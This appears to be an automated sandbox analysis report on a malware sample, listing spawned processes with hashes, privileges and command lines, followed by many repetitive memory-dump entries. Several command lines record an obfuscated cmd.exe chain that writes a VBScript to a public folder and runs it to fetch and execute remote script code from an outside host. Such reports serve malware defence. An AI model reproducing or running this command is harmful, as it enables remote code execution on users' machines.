                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs
                                                                                                                                                                                                                                  Imagebase:0x49e60000
                                                                                                                                                                                                                                  File size:302'592 bytes
                                                                                                                                                                                                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                  Start time:04:28:04
                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo"
                                                                                                                                                                                                                                  Imagebase:0x49e60000
                                                                                                                                                                                                                                  File size:302'592 bytes
                                                                                                                                                                                                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                  Start time:04:28:04
                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"
                                                                                                                                                                                                                                  Imagebase:0x49e60000
                                                                                                                                                                                                                                  File size:302'592 bytes
                                                                                                                                                                                                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                  Start time:04:28:04
                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo"
                                                                                                                                                                                                                                  Imagebase:0x49e60000
                                                                                                                                                                                                                                  File size:302'592 bytes
                                                                                                                                                                                                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                  Start time:04:28:04
                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"
                                                                                                                                                                                                                                  Imagebase:0x49e60000
                                                                                                                                                                                                                                  File size:302'592 bytes
                                                                                                                                                                                                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                  Start time:04:28:04
                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs
                                                                                                                                                                                                                                  Imagebase:0x49e60000
                                                                                                                                                                                                                                  File size:302'592 bytes
                                                                                                                                                                                                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                  Start time:04:28:04
                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs"
                                                                                                                                                                                                                                  Imagebase:0x250000
                                                                                                                                                                                                                                  File size:141'824 bytes
                                                                                                                                                                                                                                  MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Reset < >
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
